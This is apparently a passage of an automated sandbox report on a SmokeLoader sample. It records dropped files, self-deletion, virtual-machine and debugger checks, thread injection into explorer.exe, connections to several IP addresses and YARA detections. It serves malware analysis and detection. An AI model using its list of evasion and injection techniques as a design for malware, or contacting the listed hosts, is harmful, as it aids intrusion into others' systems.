Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00631540 pushad ; ret	5_2_00631550
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_0071433C push esp; ret	5_2_0071433E
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_007131DC pushfd ; iretd	5_2_007131DD
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_007126DF push B63524ADh; retn 001Fh	5_2_00712716
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_0070D4BC pushad ; retf 0070h	5_2_0070D4BD
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_0040100B push esi; ret	6_2_0040100C
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_0040280E push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_0040281F push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_00402822 push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_00401328 push edi; retf	6_2_0040132A
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004027ED push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004027FB push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_00792C2B push 9A832F1Fh; iretd	6_2_00792C31
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_0078D908 pushad ; retf	6_2_0078D965
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_007914BD push edi; retf	6_2_007914BE
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_007911A6 push esi; ret	6_2_007911A7
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_02161909 push esp; iretd	6_2_021619BF
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_02162854 push esp; ret	6_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_02162875 push esp; ret	6_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_02161072 push esi; ret	6_2_02161073
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_02162862 push esp; ret	6_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_02161386 push edi; retf	6_2_02161391

Source: HaPJ2rPP6w.exe	Static PE information: section name: .text entropy: 7.50895133113937
Source: C12E.exe.1.dr	Static PE information: section name: .text entropy: 7.512866220320031
Source: bbdeaec.1.dr	Static PE information: section name: .text entropy: 7.512866220320031
Source: wideaec.1.dr	Static PE information: section name: .text entropy: 7.50895133113937

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\bbdeaec	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wideaec	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C12E.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\89ED.exe	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\bbdeaec			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wideaec			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\hapj2rpp6w.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\wideaec:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\bbdeaec:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\wideaec	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\wideaec	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\bbdeaec	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\bbdeaec	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wideaec, 00000005.00000002.2054030316.00000000006FE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 417	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 810	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 659	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2532	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 893	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 860	Jump to behavior

Source: C:\Users\user\AppData\Roaming\bbdeaec	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_13-4482
Source: C:\Users\user\AppData\Roaming\wideaec	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_14-4481

Source: C:\Users\user\AppData\Roaming\bbdeaec	API coverage: 0.4 %
Source: C:\Users\user\AppData\Roaming\wideaec	API coverage: 0.4 %

Source: C:\Windows\explorer.exe TID: 7420	Thread sleep count: 417 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7428	Thread sleep count: 810 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7428	Thread sleep time: -81000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7424	Thread sleep count: 659 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7424	Thread sleep time: -65900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7772	Thread sleep count: 284 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7776	Thread sleep count: 274 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7780	Thread sleep count: 272 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7968	Thread sleep count: 85 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7964	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7428	Thread sleep count: 2532 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7428	Thread sleep time: -253200s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_004167C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00511ce4h], 11h and CTI: jne 004169C0h	0_2_004167C0
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_004167C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00511ce4h], 11h and CTI: jne 004169C0h	5_2_004167C0
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_00416EC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00512ce4h], 11h and CTI: jne 004170C0h	6_2_00416EC0
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_00416EC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00512ce4h], 11h and CTI: jne 004170C0h	12_2_00416EC0
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 13_2_00416EC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00512ce4h], 11h and CTI: jne 004170C0h	13_2_00416EC0
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 14_2_004167C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00511ce4h], 11h and CTI: jne 004169C0h	14_2_004167C0

Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_00000001400040F4 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,		7_2_00000001400040F4
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_0000000140003A74 FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,		7_2_0000000140003A74

Source: explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1770604413.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1765948040.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1771459949.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1770604413.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 89ED.exe, 00000007.00000002.2479502046.0000000000563000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000001.00000000.1771459949.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1765948040.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1770604413.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Roaming\bbdeaec	API call chain: ExitProcess graph end node			graph_13-4484
Source: C:\Users\user\AppData\Roaming\wideaec	API call chain: ExitProcess graph end node			graph_14-4483

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Roaming\bbdeaec

Code function: 13_2_0040386F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

13_2_0040386F

Source: C:\Users\user\AppData\Local\Temp\89ED.exe

Code function: 7_2_00000001400029DC LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

7_2_00000001400029DC

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_006B092B mov eax, dword ptr fs:[00000030h]	0_2_006B092B
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_006B0D90 mov eax, dword ptr fs:[00000030h]	0_2_006B0D90
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00850DE0 push dword ptr fs:[00000030h]	0_2_00850DE0
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_0063092B mov eax, dword ptr fs:[00000030h]	5_2_0063092B
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00630D90 mov eax, dword ptr fs:[00000030h]	5_2_00630D90
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_007101C0 push dword ptr fs:[00000030h]	5_2_007101C0
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_0078FFD5 push dword ptr fs:[00000030h]	6_2_0078FFD5
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_0216092B mov eax, dword ptr fs:[00000030h]	6_2_0216092B
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_02160D90 mov eax, dword ptr fs:[00000030h]	6_2_02160D90
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_005A092B mov eax, dword ptr fs:[00000030h]	12_2_005A092B
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_005A0D90 mov eax, dword ptr fs:[00000030h]	12_2_005A0D90
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_006B019D push dword ptr fs:[00000030h]	12_2_006B019D

Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_000000014001FA00 SetUnhandledExceptionFilter,	7_2_000000014001FA00
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 13_2_0040386F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0040386F
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 13_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00401000
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 13_2_0040602A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0040602A
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 13_2_00404149 SetUnhandledExceptionFilter,	13_2_00404149
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 14_2_0040386F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_0040386F
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 14_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00401000
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 14_2_0040602A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0040602A
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 14_2_00404149 SetUnhandledExceptionFilter,	14_2_00404149

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 89ED.exe.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 217.197.91.145 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 180.75.11.133 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 177.129.90.106 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Thread created: C:\Windows\explorer.exe EIP: 7DB19A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Thread created: unknown EIP: 87419A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Thread created: unknown EIP: 9B01970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Thread created: unknown EIP: 9C81970	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\89ED.exe

Code function: 7_2_0000000140006C88 ??3@YAXPEAX@Z,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPEAX@Z,??3@YAXPEAX@Z,

7_2_0000000140006C88

Source: C:\Users\user\AppData\Local\Temp\89ED.exe

Code function: 7_2_0000000140002A50 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

7_2_0000000140002A50

Source: explorer.exe, 00000001.00000000.1770604413.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765766695.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1764786826.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1764786826.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1764786826.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1764786826.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,??2@YAPEAX_K@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPEAX@Z,SetLastError,lstrlenA,??2@YAPEAX_K@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,	7_2_00000001400027A0
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: GetLocaleInfoA,	13_2_00406DFC
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: GetLocaleInfoA,	14_2_00406DFC

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe

Code function: 0_2_004167C0 InterlockedCompareExchange,GetFocus,ReadConsoleW,FindAtomW,SetConsoleMode,GetDefaultCommConfigA,CopyFileA,CreatePipe,GetEnvironmentStringsW,ReadConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmA,ReleaseMutex,SetCommState,GetConsoleAliasesLengthW,GetComputerNameW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,FormatMessageA,GetLongPathNameW,GetCommTimeouts,LoadLibraryW,MoveFileA,InterlockedDecrement,

0_2_004167C0

Source: C:\Users\user\AppData\Local\Temp\89ED.exe

Code function: 7_2_0000000140007830 ?_set_new_handler@@YAP6AH_K@ZP6AH0@Z@Z,GetVersionExW,GetCommandLineW,_wtol,GetModuleFileNameW,_wtol,??2@YAPEAX_K@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,wsprintfW,??2@YAPEAX_K@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,_wtol,??3@YAXPEAX@Z,GetCommandLineW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,GetCurrentProcess,SetProcessWorkingSetSizeEx,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,CoInitialize,_wtol,??3@YAXPEAX@Z,GetKeyState,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,GetFileAttributesW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,_wtol,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,SetLastError,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,SetCurrentDirectoryW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,MessageBoxA,

7_2_0000000140007830

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 12.3.bbdeaec.5c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.C12E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.C12E.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.bbdeaec.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.bbdeaec.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.C12E.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
